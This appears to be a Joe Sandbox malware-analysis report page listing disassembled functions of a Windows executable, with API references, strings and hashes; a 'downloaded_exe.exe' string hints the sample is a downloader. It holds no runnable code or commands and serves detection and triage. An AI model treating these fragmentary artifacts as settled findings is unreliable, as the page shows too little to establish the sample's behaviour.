%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF7FE93A18F
basic_string::erase, xrefs: 00007FF7FE93A188

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: $%s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append$basic_string::erase
API String ID: 0-3660802673
Opcode ID: 8948d7a70f586c780a125487a384eef4093d1a6f5429d69299ea46660f13a623
Instruction ID: 0110f126c19f251bc2d2efda8521cf95dd21c4b7cd8182f5d5bee991133904dc
Opcode Fuzzy Hash: 8948d7a70f586c780a125487a384eef4093d1a6f5429d69299ea46660f13a623
Instruction Fuzzy Hash: 9F127D72608B8285DB60EF25E4443AEB3A5FBC5B84F804135DAAD077A9DF3CD444D7A1

Function 00007FF7FE925DE0 Relevance: 4.8, APIs: 2, Instructions: 2318stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7FE925F41

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 433a4821daa6e378b90dd10c1a68e8f88ad464b9655d7b3e44b0d1e1db1e8ff3
Instruction ID: b376ca131114573d0436fdd8f9c44c6adcafb30e5ceb133e2f19e70853c942c6
Opcode Fuzzy Hash: 433a4821daa6e378b90dd10c1a68e8f88ad464b9655d7b3e44b0d1e1db1e8ff3
Instruction Fuzzy Hash: ED23A232A09B9185EB60DB25E4403AEB7A0FB85B90F954235DEAD03BE5DF3CD450C7A1

Function 00007FF7FE911740 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 105COMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 00007FF7FE911806

Part of subcall function 00007FF7FE900690: GetCurrentProcess.KERNEL32 ref: 00007FF7FE9006C0
Part of subcall function 00007FF7FE900690: TerminateProcess.KERNEL32 ref: 00007FF7FE9006CE

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF7FE911746, 00007FF7FE911845
0123456789, xrefs: 00007FF7FE911758

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: Process$CurrentTerminatememcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$0123456789
API String ID: 1371612482-1546912705
Opcode ID: b89cea8fe2a5a85c4d2563afe4040aff8482685584343ed86b917b03a912a30c
Instruction ID: 96f3e65f1918ea02ac68f09f8f0b3817e993b45c6bf0366a25c565e8e5d6034e
Opcode Fuzzy Hash: b89cea8fe2a5a85c4d2563afe4040aff8482685584343ed86b917b03a912a30c
Instruction Fuzzy Hash: E621C817F14995A8EB11EB7AA8006FD6B50E749FE4F8841B2EE1D13784DA3CD145C361

Function 00007FF7FE92CE10 Relevance: 4.5, APIs: 2, Instructions: 1963COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF7FE92CF6A

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-0
Opcode ID: 0bbd2275f2cabf8d1479adc8d43555b5c4289de4b67c3ef84f89befd236f7a2f
Instruction ID: 93a012abb52112d4746fa16d43691628bb60345859f1c4fa030f6e414bcad5ba
Opcode Fuzzy Hash: 0bbd2275f2cabf8d1479adc8d43555b5c4289de4b67c3ef84f89befd236f7a2f
Instruction Fuzzy Hash: CF139036A08B8585EB60EF25E4402AEB7A5FBC4B84F954131DE9D137E8DF38D480D7A1

Function 00007FF7FE9383A0 Relevance: 4.2, Strings: 3, Instructions: 408COMMON

Download Yara Rule

Strings

, xrefs: 00007FF7FE938414
basic_string::append, xrefs: 00007FF7FE9387A8, 00007FF7FE9388BE
%.*Lf, xrefs: 00007FF7FE938B37, 00007FF7FE938BA1

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: memcpy$memset
String ID: $%.*Lf$basic_string::append
API String ID: 438689982-2012992446
Opcode ID: 191b14571d126cfe5456ed1b3c9dd83dd11dabbb25bfd6fd0dff4edc7723bd2b
Instruction ID: 4b689f973006bb3829e0aad8b52cd7be67efa945568a3a53bf48ed6f7b2de930
Opcode Fuzzy Hash: 191b14571d126cfe5456ed1b3c9dd83dd11dabbb25bfd6fd0dff4edc7723bd2b
Instruction Fuzzy Hash: 9DF19332A08B9188E720EF69E8402ADB765FB84B94F844136EE9C17BD9CF3CD541D761

Function 00007FF7FE936C30 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 605COMMON

Download Yara Rule

Strings

%.*Lf, xrefs: 00007FF7FE9373A7, 00007FF7FE93740C

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: %.*Lf
API String ID: 0-1110018102
Opcode ID: fc7c52cf05ce6f3e826b2267e2feaf3c830d098a9c095c4e8eb3c0ec8e8bc3d6
Instruction ID: f4973d4011f57b96a5617f0626546c017e2054c43f0599e655840797e69ead51
Opcode Fuzzy Hash: fc7c52cf05ce6f3e826b2267e2feaf3c830d098a9c095c4e8eb3c0ec8e8bc3d6
Instruction Fuzzy Hash: 18326F36608B8589D720EF65F8402AEB7A4F788B94F944126EEDC03B99CF3CD154CB61

Function 00007FF7FE93ACA0 Relevance: 3.2, APIs: 2, Instructions: 250COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: ___lc_codepage_func___mb_cur_max_func
String ID:
API String ID: 1180276535-0
Opcode ID: 9cb67e961480820536bebeb00d6da065b18261578b55ca74f401363b1c6de397
Instruction ID: 099460616b2ee058ba907fbece6c6f39ae9cee5e67133ec43011ef3d681f614c
Opcode Fuzzy Hash: 9cb67e961480820536bebeb00d6da065b18261578b55ca74f401363b1c6de397
Instruction Fuzzy Hash: 8481F672B086458DEB20EF25A80016AE7A8AB987E4FC44631EE7C037D4DE7CD4819762

Function 00007FF7FE91E0E0 Relevance: 2.9, Strings: 2, Instructions: 432COMMON

Download Yara Rule

Strings

downloaded_exe.exe, xrefs: 00007FF7FE91E0E2
cannot create shim for unknown locale::facet, xrefs: 00007FF7FE91E9F5

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: cannot create shim for unknown locale::facet$downloaded_exe.exe
API String ID: 0-1456633114
Opcode ID: 62743172c136b2d5f129b88f111706e333fd6bb678aa8309a12ddf07b7cfc754
Instruction ID: 4f69e34d2c0bbb23e0999d2f6b0dd203884c6bd4dd7ccb69da7a41166741f1f1
Opcode Fuzzy Hash: 62743172c136b2d5f129b88f111706e333fd6bb678aa8309a12ddf07b7cfc754
Instruction Fuzzy Hash: 9E322832A09B4296E750EF15E85532EB2A0FB84744F848138C6AD47BD1DF7CE5A583F2

Function 00007FF7FE91D790 Relevance: 2.9, Strings: 2, Instructions: 432COMMON

Download Yara Rule

Strings

cannot create shim for unknown locale::facet, xrefs: 00007FF7FE91E0A5
downloaded_exe.exe, xrefs: 00007FF7FE91D792

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: cannot create shim for unknown locale::facet$downloaded_exe.exe
API String ID: 0-1456633114
Opcode ID: 17a3e1f696cb1348ca93f95596bd03b89dd6986d277a00382150d1415382fdf1
Instruction ID: 95652a269c1ca1753679adf6fb13e2f4b757a2af833172b0e8c9b659f79f545c
Opcode Fuzzy Hash: 17a3e1f696cb1348ca93f95596bd03b89dd6986d277a00382150d1415382fdf1
Instruction Fuzzy Hash: 48322832A09B4296E750EF19E45436EB2A0FB84744F848138C6AD07BD1DF7DE5A583F2

Function 00007FF7FE9A6840 Relevance: 2.6, Strings: 2, Instructions: 104COMMON

Download Yara Rule

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF7FE9A68FC
basic_string::append, xrefs: 00007FF7FE9A6860, 00007FF7FE9A6897, 00007FF7FE9A68F5, 00007FF7FE9A6908, 00007FF7FE9A694A

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::append
API String ID: 0-4063909124
Opcode ID: 27601b3a49b148fab835f056eb57cb1c7f8705dffc353110fca0a72c85d259cf
Instruction ID: 47d509d8053c7514b2a295e12f56b7b18fa274aecf73c5dfddc370a1d3d71803
Opcode Fuzzy Hash: 27601b3a49b148fab835f056eb57cb1c7f8705dffc353110fca0a72c85d259cf
Instruction Fuzzy Hash: DC219552F1668991DB00EF2ED8450A8A221AB95FB0BD45732C9BC137D1EE2CD6D28771

Function 00007FF7FE9B2250 Relevance: 2.6, Strings: 2, Instructions: 104COMMON

Download Yara Rule

Strings

basic_ios::clear, xrefs: 00007FF7FE9B2275
downloaded_exe.exe, xrefs: 00007FF7FE9B2294

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID: basic_ios::clear$downloaded_exe.exe
API String ID: 0-461884909
Opcode ID: 75223fd20f23eadbbf4237467108768d837fe0d45274afb626fe983bdef06659
Instruction ID: e92dc75c3ffede484ce44aa85ecf700eddaa2c44e4e0c2bffebea16790317b99
Opcode Fuzzy Hash: 75223fd20f23eadbbf4237467108768d837fe0d45274afb626fe983bdef06659
Instruction Fuzzy Hash: 6F319352A0864584EB58FB1AA8452BD9351EFC5FC4FD88031DEAD0B3D6DE2CD54283B1

Function 00007FF7FE92BC00 Relevance: 2.3, APIs: 1, Instructions: 1097COMMON

Download Yara Rule

APIs

wcslen.MSVCRT ref: 00007FF7FE92BE42

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: wcslen
String ID:
API String ID: 4088430540-0
Opcode ID: 691ddd1e75fb7ab249e9e8edc32b2c10d51479fb9bda99a9042f0ca3cd1d3878
Instruction ID: 005bd45eacf7dfb29e0597d49663111b0e0caaa8e18571c9908f67c06cb5fb62
Opcode Fuzzy Hash: 691ddd1e75fb7ab249e9e8edc32b2c10d51479fb9bda99a9042f0ca3cd1d3878
Instruction Fuzzy Hash: F8B27C32B08B5185EB60DF69D4442BD77B0FB84B88F968522DE5D13798DF38D881C3A2

Function 00007FF7FE924C20 Relevance: 2.3, APIs: 1, Instructions: 1086stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF7FE924E43

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 801f84c57c212d857836aa868d793eb11a1629755c99cae0c845807308776b05
Instruction ID: 8f200b2af1cedeba7b5411fcb51202c9d93b1056aadddb36b6ee53232908a01e
Opcode Fuzzy Hash: 801f84c57c212d857836aa868d793eb11a1629755c99cae0c845807308776b05
Instruction Fuzzy Hash: 91B29E32A08B9185EB20DF65D4442ADB771F784BA4F928635CE6D137D8DF38D881C3A2

Function 00007FF7FE93B900 Relevance: 2.2, APIs: 1, Instructions: 1000COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 02f021faba8186e1cd737539963c5a04dbf0d0e2821ab4e492991a5e0ed639b4
Instruction ID: 9f7b7bc8a45b290d09842cb02d94e2d48f3d2749b299f72c293482c2c5dcc3d8
Opcode Fuzzy Hash: 02f021faba8186e1cd737539963c5a04dbf0d0e2821ab4e492991a5e0ed639b4
Instruction Fuzzy Hash: B9A2A33260CA8189E730DA29904436EBBA4F7C1BA4F544235DAED43BD4DF7CD8549BB2

Function 00007FF7FE93CC50 Relevance: 2.2, APIs: 1, Instructions: 982COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f0703f68adf981595c0e4e782a8c0c902a2d02552d331ce89baff1752023597
Instruction ID: 9b36e907d14ce88966a9254dd38238b6179357be45c65d78fcb34bab557b8936
Opcode Fuzzy Hash: 2f0703f68adf981595c0e4e782a8c0c902a2d02552d331ce89baff1752023597
Instruction Fuzzy Hash: C8A2B23260CBC189E730DA69905032ABBA5F7C1BA4F545231DAAD43BD4CF7CD8549BB2

Function 00007FF7FE93DF70 Relevance: 2.2, APIs: 1, Instructions: 976COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19ddc3519ae61a81234623dbb2537a198159fe4a7f078318276ad930b5c9119e
Instruction ID: a561956ae7270bbcd522c4eb2b398a77462f3811c10c6955957c995ec1d57089
Opcode Fuzzy Hash: 19ddc3519ae61a81234623dbb2537a198159fe4a7f078318276ad930b5c9119e
Instruction Fuzzy Hash: 91A2C23260C7C189E770DA29A44036EBBA4F7C5BA4F544231DAAD43BD4CF7CD8549BA2

Function 00007FF7FE93F280 Relevance: 2.2, APIs: 1, Instructions: 975COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e23c90688eadaebbedfd1b028ceec8a4619dcda309f29e7056abb2166806d47d
Instruction ID: a97402627d1d7d3eff25ae31058fac475721b79ac1822ba7a4b1be594cc791fd
Opcode Fuzzy Hash: e23c90688eadaebbedfd1b028ceec8a4619dcda309f29e7056abb2166806d47d
Instruction Fuzzy Hash: 07A2B33260C78189E730DA29904436EFBA1F7C5BA4F504235DAAD43BE4CF7CD8549BA2

Function 00007FF7FE9405A0 Relevance: 2.2, APIs: 1, Instructions: 961COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2314406573.00007FF7FE8F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7FE8F0000, based on PE: true

Associated: 00000000.00000002.2314370363.00007FF7FE8F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314540478.00007FF7FE9BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314571999.00007FF7FE9BF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314627173.00007FF7FE9ED000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314648387.00007FF7FE9EF000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2314669899.00007FF7FE9F2000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7fe8f0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d8fcc9920dd9aa6edade4b08bf091255ef071fc3745480d0351c8431f3b0961
Instruction ID: e862319c0846b15b3125618e0b80cf122e3a5d17e903a1b7f6cf3cc59960d65c
Opcode Fuzzy Hash: 5d8fcc9920dd9aa6edade4b08bf091255ef071fc3745480d0351c8431f3b0961
Instruction Fuzzy Hash: 9EA2B22260CBD185E760DA29904036EABA1F7C5BA4F548232DABD03BD5DF7CD454CBA2

Function 00007FF7FE923470 Relevance: 2.2, Strings: 1, Instructions: 948COMMON

Download Yara Rule

Strings

c, xrefs: 00007FF7FE9239E7

Memory Dump Source

